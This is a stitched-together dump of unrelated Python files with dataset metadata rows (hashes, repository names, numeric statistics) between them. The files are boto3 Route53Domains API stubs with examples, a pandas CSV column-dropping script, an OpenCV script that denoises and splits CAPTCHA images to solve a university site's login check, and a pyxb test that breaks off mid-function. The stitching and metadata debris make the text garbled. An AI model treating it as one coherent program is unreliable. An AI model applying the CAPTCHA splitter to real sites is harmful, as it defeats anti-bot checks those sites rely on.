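        AdminPrivacy=True,
        RegistrantPrivacy=True,
        TechPrivacy=True,
    )
    return response['OperationId']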
def update_domain_nameservers(DomainName=None, FIAuthKey=None, Nameservers=None):
"""
This operation replaces the current set of name servers for the domain with the specified set of name servers. If you use Amazon Route 53 as your DNS service, specify the four name servers in the delegation set for the hosted zone for the domain.
If successful, this operation returns an operation ID that you can use to track the progress and completion of the action. If the request is not completed successfully, the domain registrant will be notified by email.
See also: AWS API Documentation
Exceptions
:example: response = client.update_domain_nameservers(
DomainName='string',
FIAuthKey='string',
Nameservers=[
{
'Name': 'string',
'GlueIps': [
'string',
]
},
]
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain that you want to change name servers for.\n
:type FIAuthKey: string
:param FIAuthKey: The authorization key for .fi domains
:type Nameservers: list
:param Nameservers: [REQUIRED]\nA list of new name servers for the domain.\n\n(dict) --Nameserver includes the following elements.\n\nName (string) -- [REQUIRED]The fully qualified host name of the name server.\nConstraint: Maximum 255 characters\n\nGlueIps (list) --Glue IP address of a name server entry. Glue IP addresses are required only when the name of the name server is a subdomain of the domain. For example, if your domain is example.com and the name server for the domain is ns.example.com, you need to specify the IP address for ns.example.com.\nConstraints: The list can contain only one IPv4 and one IPv6 address.\n\n(string) --\n\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'OperationId': 'string'
}
Response Structure
(dict) --
The UpdateDomainNameservers response includes the following element.
OperationId (string) --
Identifier for tracking the progress of the request. To query the operation status, use GetOperationDetail .
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.DuplicateRequest
Route53Domains.Client.exceptions.TLDRulesViolation
Route53Domains.Client.exceptions.OperationLimitExceeded
Route53Domains.Client.exceptions.UnsupportedTLD
:return: {
'OperationId': 'string'
}
:returns:
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.DuplicateRequest
Route53Domains.Client.exceptions.TLDRulesViolation
Route53Domains.Client.exceptions.OperationLimitExceeded
Route53Domains.Client.exceptions.UnsupportedTLD
"""
pass
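# --- Illustrative sketch (not part of the generated stubs) ---
# A minimal example of pointing a registered domain at a Route 53 hosted zone
# by passing the zone's four delegation-set name servers, as described above.
# The domain name and hosted zone ID are placeholders; boto3 and credentials
# are assumed. GlueIps are omitted because these name servers are not
# subdomains of the domain being updated.
def _example_update_nameservers_to_hosted_zone(hosted_zone_id='Z0123456789ABCDEFGHIJ'):
    import boto3

    route53 = boto3.client('route53')
    domains = boto3.client('route53domains')

    zone = route53.get_hosted_zone(Id=hosted_zone_id)
    nameservers = [{'Name': ns} for ns in zone['DelegationSet']['NameServers']]

    response = domains.update_domain_nameservers(
        DomainName='example.com',
        Nameservers=nameservers,
    )
    return response['OperationId']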
def update_tags_for_domain(DomainName=None, TagsToUpdate=None):
"""
This operation adds or updates tags for a specified domain.
All tag operations are eventually consistent; subsequent operations might not immediately represent all issued operations.
See also: AWS API Documentation
Exceptions
:example: response = client.update_tags_for_domain(
DomainName='string',
TagsToUpdate=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe domain for which you want to add or update tags.\n
:type TagsToUpdate: list
:param TagsToUpdate: A list of the tag keys and values that you want to add or update. If you specify a key that already exists, the corresponding value will be replaced.\n\n(dict) --Each tag includes the following elements.\n\nKey (string) --The key (name) of a tag.\nValid values: A-Z, a-z, 0-9, space, '.:/=+-@'\nConstraints: Each key can be 1-128 characters long.\n\nValue (string) --The value of a tag.\nValid values: A-Z, a-z, 0-9, space, '.:/=+-@'\nConstraints: Each value can be 0-256 characters long.\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.OperationLimitExceeded
Route53Domains.Client.exceptions.UnsupportedTLD
:return: {}
:returns:
(dict) --
"""
pass
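# --- Illustrative sketch (not part of the generated stubs) ---
# A minimal example of adding or replacing two tags on a domain; specifying an
# existing key overwrites its value, as noted above. The domain and tag values
# are placeholders; boto3 and credentials are assumed.
def _example_tag_domain():
    import boto3

    client = boto3.client('route53domains')
    client.update_tags_for_domain(
        DomainName='example.com',
        TagsToUpdate=[
            {'Key': 'Environment', 'Value': 'production'},
            {'Key': 'Owner', 'Value': 'dns-team'},
        ],
    )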
def view_billing(Start=None, End=None, Marker=None, MaxItems=None):
"""
Returns all the domain-related billing records for the current AWS account for a specified period.
See also: AWS API Documentation
Exceptions
:example: response = client.view_billing(
Start=datetime(2015, 1, 1),
End=datetime(2015, 1, 1),
Marker='string',
MaxItems=123
)
:type Start: datetime
:param Start: The beginning date and time for the time period for which you want a list of billing records. Specify the date and time in Unix time format and Coordinated Universal Time (UTC).
:type End: datetime
:param End: The end date and time for the time period for which you want a list of billing records. Specify the date and time in Unix time format and Coordinated Universal Time (UTC).
:type Marker: string
:param Marker: For an initial request for a list of billing records, omit this element. If the number of billing records that are associated with the current AWS account during the specified period is greater than the value that you specified for MaxItems , you can use Marker to return additional billing records. Get the value of NextPageMarker from the previous response, and submit another request that includes the value of NextPageMarker in the Marker element.\nConstraints: The marker must match the value of NextPageMarker that was returned in the previous response.\n
:type MaxItems: integer
:param MaxItems: The number of billing records to be returned.\nDefault: 20\n
:rtype: dict
ReturnsResponse Syntax
{
'NextPageMarker': 'string',
'BillingRecords': [
{
'DomainName': 'string',
'Operation': 'REGISTER_DOMAIN'|'DELETE_DOMAIN'|'TRANSFER_IN_DOMAIN'|'UPDATE_DOMAIN_CONTACT'|'UPDATE_NAMESERVER'|'CHANGE_PRIVACY_PROTECTION'|'DOMAIN_LOCK'|'ENABLE_AUTORENEW'|'DISABLE_AUTORENEW'|'ADD_DNSSEC'|'REMOVE_DNSSEC'|'EXPIRE_DOMAIN'|'TRANSFER_OUT_DOMAIN'|'CHANGE_DOMAIN_OWNER'|'RENEW_DOMAIN'|'PUSH_DOMAIN'|'INTERNAL_TRANSFER_OUT_DOMAIN'|'INTERNAL_TRANSFER_IN_DOMAIN',
'InvoiceId': 'string',
'BillDate': datetime(2015, 1, 1),
'Price': 123.0
},
]
}
Response Structure
(dict) --
The ViewBilling response includes the following elements.
NextPageMarker (string) --
If there are more billing records than you specified for MaxItems in the request, submit another request and include the value of NextPageMarker in the value of Marker .
BillingRecords (list) --
A summary of billing records.
(dict) --
Information for one billing record.
DomainName (string) --
The name of the domain that the billing record applies to. If the domain name contains characters other than a-z, 0-9, and - (hyphen), such as an internationalized domain name, then this value is in Punycode. For more information, see DNS Domain Name Format in the Amazon Route 53 Developer Guide .
Operation (string) --
The operation that you were charged for.
InvoiceId (string) --
The ID of the invoice that is associated with the billing record.
BillDate (datetime) --
The date that the operation was billed, in Unix format.
Price (float) --
The price that you were charged for the operation, in US dollars.
Example value: 12.0
Exceptions
Route53Domains.Client.exceptions.InvalidInput
:return: {
'NextPageMarker': 'string',
'BillingRecords': [
{
'DomainName': 'string',
'Operation': 'REGISTER_DOMAIN'|'DELETE_DOMAIN'|'TRANSFER_IN_DOMAIN'|'UPDATE_DOMAIN_CONTACT'|'UPDATE_NAMESERVER'|'CHANGE_PRIVACY_PROTECTION'|'DOMAIN_LOCK'|'ENABLE_AUTORENEW'|'DISABLE_AUTORENEW'|'ADD_DNSSEC'|'REMOVE_DNSSEC'|'EXPIRE_DOMAIN'|'TRANSFER_OUT_DOMAIN'|'CHANGE_DOMAIN_OWNER'|'RENEW_DOMAIN'|'PUSH_DOMAIN'|'INTERNAL_TRANSFER_OUT_DOMAIN'|'INTERNAL_TRANSFER_IN_DOMAIN',
'InvoiceId': 'string',
'BillDate': datetime(2015, 1, 1),
'Price': 123.0
},
]
}
:returns:
Route53Domains.Client.exceptions.InvalidInput
"""
pass
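A short pagination sketch for the view_billing call documented above: keep passing NextPageMarker back as Marker until the response no longer contains one. The client construction, date range, and page size are assumptions for illustration, not part of the stub.

import boto3
from datetime import datetime

client = boto3.client('route53domains')

billing_records = []
kwargs = {'Start': datetime(2015, 1, 1), 'End': datetime(2016, 1, 1), 'MaxItems': 20}
while True:
    page = client.view_billing(**kwargs)
    billing_records.extend(page.get('BillingRecords', []))
    marker = page.get('NextPageMarker')
    if not marker:
        break
    # Resume from where the previous response left off.
    kwargs['Marker'] = marker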
| 53.189659
| 7,408
| 0.728022
| 34,505
| 251,002
| 5.19345
| 0.037994
| 0.007282
| 0.016161
| 0.025251
| 0.931088
| 0.91894
| 0.910921
| 0.90385
| 0.899369
| 0.895279
| 0
| 0.006875
| 0.162684
| 251,002
| 4,718
| 7,409
| 53.200933
| 0.845776
| 0.974992
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0.515625
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 10
|
da92f2ef06471acbe1f086a584424338ddbc004c
| 2,485
|
py
|
Python
|
dataframe_parser.py
|
Duke-Autism/ACE
|
a23ef9a6bb98123c7f71ff1afdd85a6d9a5374c7
|
[
"BSD-3-Clause"
] | null | null | null |
dataframe_parser.py
|
Duke-Autism/ACE
|
a23ef9a6bb98123c7f71ff1afdd85a6d9a5374c7
|
[
"BSD-3-Clause"
] | null | null | null |
dataframe_parser.py
|
Duke-Autism/ACE
|
a23ef9a6bb98123c7f71ff1afdd85a6d9a5374c7
|
[
"BSD-3-Clause"
] | null | null | null |
# Collect each CSV in the working directory, drop bookkeeping columns, and stack the remaining column names into output/final.csv.
import glob
import os

import pandas

files = glob.glob("*.csv")
names = []
reader = []
header = []
final = []
data_stack = []
print(os.getcwd())
for file in files:
names.append(file[:-4])
for i in range(0, len(files)):
final_df = pandas.read_csv(files[i]).head(0)
final_df = final_df.drop(final_df.filter(like='_INT').columns, 1)
final_df = final_df.drop(final_df.filter(like='_RAW').columns, 1)
final_df = final_df.drop(final_df.filter(like='_MM').columns, 1)
final_df = final_df.drop(final_df.filter(like='_YYYY').columns, 1)
final_df = final_df.drop(final_df.filter(like='projectid').columns, 1)
final_df = final_df.drop(final_df.filter(like='studyid').columns, 1)
final_df = final_df.drop(final_df.filter(like='environmentName').columns, 1)
final_df = final_df.drop(final_df.filter(like='subjectId').columns, 1)
final_df = final_df.drop(final_df.filter(like='StudySiteId').columns, 1)
final_df = final_df.drop(final_df.filter(like='siteid').columns, 1)
final_df = final_df.drop(final_df.filter(like='Site').columns, 1)
final_df = final_df.drop(final_df.filter(like='SiteNumber').columns, 1)
final_df = final_df.drop(final_df.filter(like='SiteGroup').columns, 1)
final_df = final_df.drop(final_df.filter(like='instanceId').columns, 1)
final_df = final_df.drop(final_df.filter(like='InstanceName').columns, 1)
final_df = final_df.drop(final_df.filter(like='InstanceRepeatNumber').columns, 1)
final_df = final_df.drop(final_df.filter(like='folderid').columns, 1)
final_df = final_df.drop(final_df.filter(like='Folder').columns, 1)
final_df = final_df.drop(final_df.filter(like='FolderSeq').columns, 1)
final_df = final_df.drop(final_df.filter(like='TargetDays').columns, 1)
final_df = final_df.drop(final_df.filter(like='InstanceName').columns, 1)
final_df = final_df.drop(final_df.filter(like='DataPageId').columns, 1)
final_df = final_df.drop(final_df.filter(like='DataPageName').columns, 1)
final_df = final_df.drop(final_df.filter(like='PageRepeatNumber').columns, 1)
final_df = final_df.drop(final_df.filter(like='RecordId').columns, 1)
final_df = final_df.drop(final_df.filter(like='SaveTS').columns, 1)
final_df = final_df.drop(final_df.filter(like='INVSITE').columns, 1)
final_df = final_df.transpose()
data_stack.extend(final_df.index.tolist())
final_df.to_csv(str(os.getcwd())+'/output/'+ files[i])
df = pandas.DataFrame(data_stack)
df.to_csv(str(os.getcwd())+'/output/final.csv')
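The long chain of drop calls above repeats one pattern per column family. A behaviourally equivalent sketch that keeps the same substring filters in a single list (the list below simply mirrors the filters already used above):

unwanted = ['_INT', '_RAW', '_MM', '_YYYY', 'projectid', 'studyid',
            'environmentName', 'subjectId', 'StudySiteId', 'siteid', 'Site',
            'SiteNumber', 'SiteGroup', 'instanceId', 'InstanceName',
            'InstanceRepeatNumber', 'folderid', 'Folder', 'FolderSeq',
            'TargetDays', 'DataPageId', 'DataPageName', 'PageRepeatNumber',
            'RecordId', 'SaveTS', 'INVSITE']
for pattern in unwanted:
    final_df = final_df.drop(columns=final_df.filter(like=pattern).columns)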
| 46.886792
| 84
| 0.719517
| 398
| 2,485
| 4.251256
| 0.160804
| 0.355792
| 0.198582
| 0.231678
| 0.736998
| 0.736998
| 0.723995
| 0.695626
| 0.695626
| 0.674941
| 0
| 0.013587
| 0.111469
| 2,485
| 52
| 85
| 47.788462
| 0.752717
| 0
| 0
| 0.046512
| 0
| 0
| 0.111842
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.023256
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e51b1424d10e629b02bc8b75407efde5023d7397
| 14,970
|
py
|
Python
|
Flask API/denoise_spliter_v3.py
|
exodustw/NYCU-E3-CAPTCHA-Autowrite
|
73d8e155911e5f36d9a9c5e736e8cb57c8651fc3
|
[
"CC-BY-3.0"
] | null | null | null |
Flask API/denoise_spliter_v3.py
|
exodustw/NYCU-E3-CAPTCHA-Autowrite
|
73d8e155911e5f36d9a9c5e736e8cb57c8651fc3
|
[
"CC-BY-3.0"
] | null | null | null |
Flask API/denoise_spliter_v3.py
|
exodustw/NYCU-E3-CAPTCHA-Autowrite
|
73d8e155911e5f36d9a9c5e736e8cb57c8651fc3
|
[
"CC-BY-3.0"
] | null | null | null |
import cv2
from PIL import Image
import matplotlib.pyplot as plt
import numpy as np
import os
def image_spliter(arr):
#read image
img2 = cv2.imdecode(arr, -1)
width, height, s = img2.shape
#clear the color which does not belong to the number
for la in range(3):
for i in range(width):
for j in range(height):
if img2[i, j, la] < 115:
img2.itemset((i, j, la),255)
#calculate the number of pixel which is not white and ksvd
img2Gray = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)
th3 = cv2.adaptiveThreshold(img2Gray, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 2)
for a in range(1):
for _width in range(1, width - 1 ,1):
for _height in range(1, height - 1 ,1):
area = 0
for i in range(_width - 1, _width + 2, 1):
for j in range(_height - 1, _height + 2, 1):
if i > width - 1 or j > height - 1 or (i == _width and j == _height):
continue
if th3[i, j] < 233:
area += 1
if area < 4:
th3.itemset((_width,_height),255)
#clear the noisy line
for _width in range(3, width - 2 ,1):
for _height in range(3, height - 2 ,1):
center_color = th3[_width, _height]
ucolor = th3[_width, _height + 1]
dcolor = th3[_width, _height - 1]
lcolor = th3[_width - 1, _height]
rcolor = th3[_width + 1, _height]
ulcolor = th3[_width - 1, _height + 1]
urcolor = th3[_width + 1, _height - 1]
dlcolor = th3[_width - 1, _height - 1]
drcolor = th3[_width + 1, _height - 1]
u2color = th3[_width, _height + 2]
d2color = th3[_width, _height - 2]
l2color = th3[_width - 2, _height]
r2color = th3[_width + 2, _height]
ul2color = th3[_width - 2, _height + 2]
ur2color = th3[_width + 2, _height - 2]
dl2color = th3[_width - 2, _height - 2]
dr2color = th3[_width + 2, _height - 2]
u2l1color = th3[_width - 1, _height + 2]
u2r1color = th3[_width + 1, _height - 2]
d2l1color = th3[_width - 1, _height - 2]
d2r1color = th3[_width + 1, _height - 2]
u1l2color = th3[_width - 2, _height + 1]
u1r2color = th3[_width + 2, _height - 1]
d1l2color = th3[_width - 2, _height - 1]
d1r2color = th3[_width + 2, _height - 1]
flag = 0
if ucolor == center_color:
flag += 1
if dcolor == center_color:
flag += 1
if lcolor == center_color:
flag += 1
if rcolor == center_color:
flag += 1
if ulcolor == center_color:
flag += 1
if urcolor == center_color:
flag += 1
if dlcolor == center_color:
flag += 1
if drcolor == center_color:
flag += 1
if u2color == center_color:
flag += 1
if d2color == center_color:
flag += 1
if l2color == center_color:
flag += 1
if r2color == center_color:
flag += 1
if ul2color == center_color:
flag += 1
if ur2color == center_color:
flag += 1
if dl2color == center_color:
flag += 1
if dr2color == center_color:
flag += 1
if u2l1color == center_color:
flag += 1
if u2r1color == center_color:
flag += 1
if d2l1color == center_color:
flag += 1
if d2r1color == center_color:
flag += 1
if u1l2color == center_color:
flag += 1
if u1r2color == center_color:
flag += 1
if d1l2color == center_color:
flag += 1
if d1r2color == center_color:
flag += 1
if flag < 10:
th3.itemset((_width,_height),255)
#clear the edge
for _width in range(width):
for _height in range(height):
if _width >= width-3 or _width <= 2 or _height >= height-3 or _height <= 2:
th3.itemset((_width,_height),255)
#black white exchange and found the edge of the number
th3 = cv2.bitwise_not(th3)
contours, hierarchy = cv2.findContours(th3, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
img2.fill(255)
arr = []
draw_img = cv2.drawContours(img2.copy(), contours, -1, (0, 0, 255), 1)
for cnt in contours:
x,y,w,h = cv2.boundingRect(cnt)
arr.append([x,y,x+w,y+h])
#find the big rectangle that surrounds the number
arr = np.asarray(arr)
xmin = np.min(arr[:,0])
xmax = np.max(arr[:,2])
ymin = np.min(arr[:,1])
ymax = np.max(arr[:,3])
#find each number's start x and y
x1 = xmin-2
x2 = 21+xmin
x3 = 43+xmin
x4 = 65+xmin
x5 = 95+xmin
if (x5 >= height) :
x5 = height
y1 = ymin
y2 = ymin+35
#draw rectangle(can delete this area)
cv2.rectangle(draw_img,(x1,y1),(x2,y2),(0,255,0),2)
cv2.rectangle(draw_img,(x2,y1),(x3,y2),(0,255,0),2)
cv2.rectangle(draw_img,(x3,y1),(x4,y2),(0,255,0),2)
cv2.rectangle(draw_img,(x4,y1),(x5,y2),(0,255,0),2)
#create four black background images for splitting the number
ch1 = np.zeros((40, 30, 1), dtype = "uint8")
ch2 = np.zeros((40, 30, 1), dtype = "uint8")
ch3 = np.zeros((40, 30, 1), dtype = "uint8")
ch4 = np.zeros((40, 30, 1), dtype = "uint8")
if xmax-xmin <= 90:
for i in range(x1,x2-2,1):
for j in range(y1,y2-1,1):
ch1[j-y1,i-x1] = th3[j,i]
for i in range(x2+1,x3-2,1):
for j in range(y1,y2-1,1):
ch2[j-y1,i-x2-1] = th3[j,i]
for i in range(x3+2,x4,1):
for j in range(y1,y2-1,1):
ch3[j-y1,i-x3-2] = th3[j,i]
for i in range(x4+4,x5,1):
for j in range(y1,y2-1,1):
ch4[j-y1,i-x4-4] = th3[j,i]
elif xmax-xmin <= 91:
#print('here')
for i in range(x1,x2,1):
for j in range(y1,y2-1,1):
ch1[j-y1,i-x1] = th3[j,i]
for i in range(x2+1,x3+2,1):
for j in range(y1,y2-1,1):
ch2[j-y1,i-x2-1] = th3[j,i]
for i in range(x3+3,x4+1,1):
for j in range(y1,y2-1,1):
ch3[j-y1,i-x3-3] = th3[j,i]
for i in range(x4+5,x5,1):
for j in range(y1,y2-1,1):
ch4[j-y1,i-x4-5] = th3[j,i]
else:
#print('there')
for i in range(x1,x2-1,1):
for j in range(y1,y2-1,1):
ch1[j-y1,i-x1] = th3[j,i]
for i in range(x2+3,x3+3,1):
for j in range(y1,y2-1,1):
ch2[j-y1,i-x2-3] = th3[j,i]
for i in range(x3+6,x4+3,1):
for j in range(y1,y2-1,1):
ch3[j-y1,i-x3-6] = th3[j,i]
for i in range(x4+6,x5,1):
for j in range(y1,y2-1,1):
ch4[j-y1,i-x4-6] = th3[j,i]
'''
plt.subplot(241), plt.imshow(img) # original
plt.subplot(242), plt.imshow(th3) # denoise
plt.subplot(243), plt.imshow(draw_img) # position of each number
plt.subplot(245), plt.imshow(ch1) # first number
plt.subplot(246), plt.imshow(ch2) # second number
plt.subplot(247), plt.imshow(ch3) # third number
plt.subplot(248), plt.imshow(ch4) # fourth number
plt.show()
'''
return [ch1, ch2, ch3, ch4]
def image_spliter_bgr(arr):
#read image
img2 = arr
width, height, s = img2.shape
#clear the color which does not belong to the number
for la in range(3):
for i in range(width):
for j in range(height):
if img2[i, j, la] < 115:
img2.itemset((i, j, la),255)
#calculate the number of pixel which is not white and ksvd
img2Gray = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)
th3 = cv2.adaptiveThreshold(img2Gray, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 2)
for a in range(1):
for _width in range(1, width - 1 ,1):
for _height in range(1, height - 1 ,1):
area = 0
for i in range(_width - 1, _width + 2, 1):
for j in range(_height - 1, _height + 2, 1):
if i > width - 1 or j > height - 1 or (i == _width and j == _height):
continue
if th3[i, j] < 233:
area += 1
if area < 4:
th3.itemset((_width,_height),255)
#clear the noisy line
for _width in range(3, width - 2 ,1):
for _height in range(3, height - 2 ,1):
center_color = th3[_width, _height]
ucolor = th3[_width, _height + 1]
dcolor = th3[_width, _height - 1]
lcolor = th3[_width - 1, _height]
rcolor = th3[_width + 1, _height]
ulcolor = th3[_width - 1, _height + 1]
urcolor = th3[_width + 1, _height - 1]
dlcolor = th3[_width - 1, _height - 1]
drcolor = th3[_width + 1, _height - 1]
u2color = th3[_width, _height + 2]
d2color = th3[_width, _height - 2]
l2color = th3[_width - 2, _height]
r2color = th3[_width + 2, _height]
ul2color = th3[_width - 2, _height + 2]
ur2color = th3[_width + 2, _height - 2]
dl2color = th3[_width - 2, _height - 2]
dr2color = th3[_width + 2, _height - 2]
u2l1color = th3[_width - 1, _height + 2]
u2r1color = th3[_width + 1, _height - 2]
d2l1color = th3[_width - 1, _height - 2]
d2r1color = th3[_width + 1, _height - 2]
u1l2color = th3[_width - 2, _height + 1]
u1r2color = th3[_width + 2, _height - 1]
d1l2color = th3[_width - 2, _height - 1]
d1r2color = th3[_width + 2, _height - 1]
flag = 0
if ucolor == center_color:
flag += 1
if dcolor == center_color:
flag += 1
if lcolor == center_color:
flag += 1
if rcolor == center_color:
flag += 1
if ulcolor == center_color:
flag += 1
if urcolor == center_color:
flag += 1
if dlcolor == center_color:
flag += 1
if drcolor == center_color:
flag += 1
if u2color == center_color:
flag += 1
if d2color == center_color:
flag += 1
if l2color == center_color:
flag += 1
if r2color == center_color:
flag += 1
if ul2color == center_color:
flag += 1
if ur2color == center_color:
flag += 1
if dl2color == center_color:
flag += 1
if dr2color == center_color:
flag += 1
if u2l1color == center_color:
flag += 1
if u2r1color == center_color:
flag += 1
if d2l1color == center_color:
flag += 1
if d2r1color == center_color:
flag += 1
if u1l2color == center_color:
flag += 1
if u1r2color == center_color:
flag += 1
if d1l2color == center_color:
flag += 1
if d1r2color == center_color:
flag += 1
if flag < 10:
th3.itemset((_width,_height),255)
#clear the edge
for _width in range(width):
for _height in range(height):
if _width >= width-3 or _width <= 2 or _height >= height-3 or _height <= 2:
th3.itemset((_width,_height),255)
#black white exchange and found the edge of the number
th3 = cv2.bitwise_not(th3)
contours, hierarchy = cv2.findContours(th3, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
img2.fill(255)
arr = []
draw_img = cv2.drawContours(img2.copy(), contours, -1, (0, 0, 255), 1)
for cnt in contours:
x,y,w,h = cv2.boundingRect(cnt)
arr.append([x,y,x+w,y+h])
#find the big rectangle that surrounds the number
arr = np.asarray(arr)
xmin = np.min(arr[:,0])
xmax = np.max(arr[:,2])
ymin = np.min(arr[:,1])
ymax = np.max(arr[:,3])
#find each number's start x and y
x1 = xmin-2
x2 = 21+xmin
x3 = 43+xmin
x4 = 65+xmin
x5 = 95+xmin
if (x5 >= height) :
x5 = height
y1 = ymin
y2 = ymin+35
#draw rectangle(can delete this area)
cv2.rectangle(draw_img,(x1,y1),(x2,y2),(0,255,0),2)
cv2.rectangle(draw_img,(x2,y1),(x3,y2),(0,255,0),2)
cv2.rectangle(draw_img,(x3,y1),(x4,y2),(0,255,0),2)
cv2.rectangle(draw_img,(x4,y1),(x5,y2),(0,255,0),2)
#create four black background images for splitting the number
ch1 = np.zeros((40, 30, 1), dtype = "uint8")
ch2 = np.zeros((40, 30, 1), dtype = "uint8")
ch3 = np.zeros((40, 30, 1), dtype = "uint8")
ch4 = np.zeros((40, 30, 1), dtype = "uint8")
if xmax-xmin <= 90:
for i in range(x1,x2-2,1):
for j in range(y1,y2-1,1):
ch1[j-y1,i-x1] = th3[j,i]
for i in range(x2+1,x3-2,1):
for j in range(y1,y2-1,1):
ch2[j-y1,i-x2-1] = th3[j,i]
for i in range(x3+2,x4,1):
for j in range(y1,y2-1,1):
ch3[j-y1,i-x3-2] = th3[j,i]
for i in range(x4+4,x5,1):
for j in range(y1,y2-1,1):
ch4[j-y1,i-x4-4] = th3[j,i]
elif xmax-xmin <= 91:
#print('here')
for i in range(x1,x2,1):
for j in range(y1,y2-1,1):
ch1[j-y1,i-x1] = th3[j,i]
for i in range(x2+1,x3+2,1):
for j in range(y1,y2-1,1):
ch2[j-y1,i-x2-1] = th3[j,i]
for i in range(x3+3,x4+1,1):
for j in range(y1,y2-1,1):
ch3[j-y1,i-x3-3] = th3[j,i]
for i in range(x4+5,x5,1):
for j in range(y1,y2-1,1):
ch4[j-y1,i-x4-5] = th3[j,i]
else:
#print('there')
for i in range(x1,x2-1,1):
for j in range(y1,y2-1,1):
ch1[j-y1,i-x1] = th3[j,i]
for i in range(x2+3,x3+3,1):
for j in range(y1,y2-1,1):
ch2[j-y1,i-x2-3] = th3[j,i]
for i in range(x3+6,x4+3,1):
for j in range(y1,y2-1,1):
ch3[j-y1,i-x3-6] = th3[j,i]
for i in range(x4+6,x5,1):
for j in range(y1,y2-1,1):
ch4[j-y1,i-x4-6] = th3[j,i]
'''
plt.subplot(241), plt.imshow(img) # original
plt.subplot(242), plt.imshow(th3) # denoise
plt.subplot(243), plt.imshow(draw_img) # position of each number
plt.subplot(245), plt.imshow(ch1) # first number
plt.subplot(246), plt.imshow(ch2) # second number
plt.subplot(247), plt.imshow(ch3) # third number
plt.subplot(248), plt.imshow(ch4) # fourth number
plt.show()
'''
return [ch1, ch2, ch3, ch4]
def image_to_file(dir, img_arr):
img_arr = img_arr.reshape(img_arr.shape[0], img_arr.shape[1])
img = Image.fromarray(img_arr)
img.save(dir)
if __name__ == '__main__':
nc = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
dir_in = 'E3'
dir_out = 'E3/split'
ic = 0
for filename in os.listdir(dir_in + '/img'):
ic += 1
print('Task ' + str(ic) + ': ' + filename)
char_4 = filename[0:4]
# image_spliter expects an encoded-image byte buffer (it calls cv2.imdecode),
# so read the file bytes into a numpy array rather than passing the path string.
imgs = image_spliter(np.fromfile(dir_in + '/img/' + filename, dtype=np.uint8))
for i in range(4):
image_to_file(dir_out + '/' + char_4[i] + '/' + char_4[i] + '_' + str(nc[int(char_4[i])]) + '.png', imgs[i])
nc[int(char_4[i])] += 1
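Since this module sits under Flask API/, a likely call site is an upload handler. A minimal sketch, assuming Flask is used and the request body carries the encoded CAPTCHA image; the route name and response shape are assumptions, not taken from the repository:

import numpy as np
from flask import Flask, request

app = Flask(__name__)

@app.route('/split', methods=['POST'])
def split_captcha():
    # image_spliter expects the encoded image as a byte buffer for cv2.imdecode.
    buf = np.frombuffer(request.get_data(), dtype=np.uint8)
    chars = image_spliter(buf)
    return {'parts': len(chars)}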
| 32.193548
| 111
| 0.5332
| 2,332
| 14,970
| 3.312607
| 0.091767
| 0.066149
| 0.093204
| 0.099417
| 0.943948
| 0.9411
| 0.9411
| 0.9411
| 0.9411
| 0.939806
| 0
| 0.105336
| 0.323981
| 14,970
| 464
| 112
| 32.262931
| 0.658004
| 0.054509
| 0
| 0.92973
| 0
| 0
| 0.006064
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008108
| false
| 0
| 0.013514
| 0
| 0.027027
| 0.002703
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e546eab3f77e3259d1ecdf8a42a2517b8f74bd64
| 7,034
|
py
|
Python
|
tests/drivers/test-mg-sequence.py
|
thorstenb/pyxb
|
634e86f61dfb73a2900f32fc3d819e9c25365a49
|
[
"Apache-2.0"
] | null | null | null |
tests/drivers/test-mg-sequence.py
|
thorstenb/pyxb
|
634e86f61dfb73a2900f32fc3d819e9c25365a49
|
[
"Apache-2.0"
] | null | null | null |
tests/drivers/test-mg-sequence.py
|
thorstenb/pyxb
|
634e86f61dfb73a2900f32fc3d819e9c25365a49
|
[
"Apache-2.0"
] | null | null | null |
import pyxb.binding.generate
import pyxb.utils.domutils
from xml.dom import Node
import os.path
schema_path = '%s/../schemas/test-mg-sequence.xsd' % (os.path.dirname(__file__),)
code = pyxb.binding.generate.GeneratePython(schema_location=schema_path)
rv = compile(code, 'test', 'exec')
eval(rv)
from pyxb.exceptions_ import *
from pyxb.utils import domutils
def ToDOM (instance, tag=None):
return instance.toDOM().documentElement
import unittest
class TestMGSeq (unittest.TestCase):
def testBad (self):
# Second is wrong element tag
xml = '<ns1:wrapper xmlns:ns1="URN:test-mg-sequence"><first/><second/><third/><fourth_0_2/></ns1:wrapper>'
dom = pyxb.utils.domutils.StringToDOM(xml)
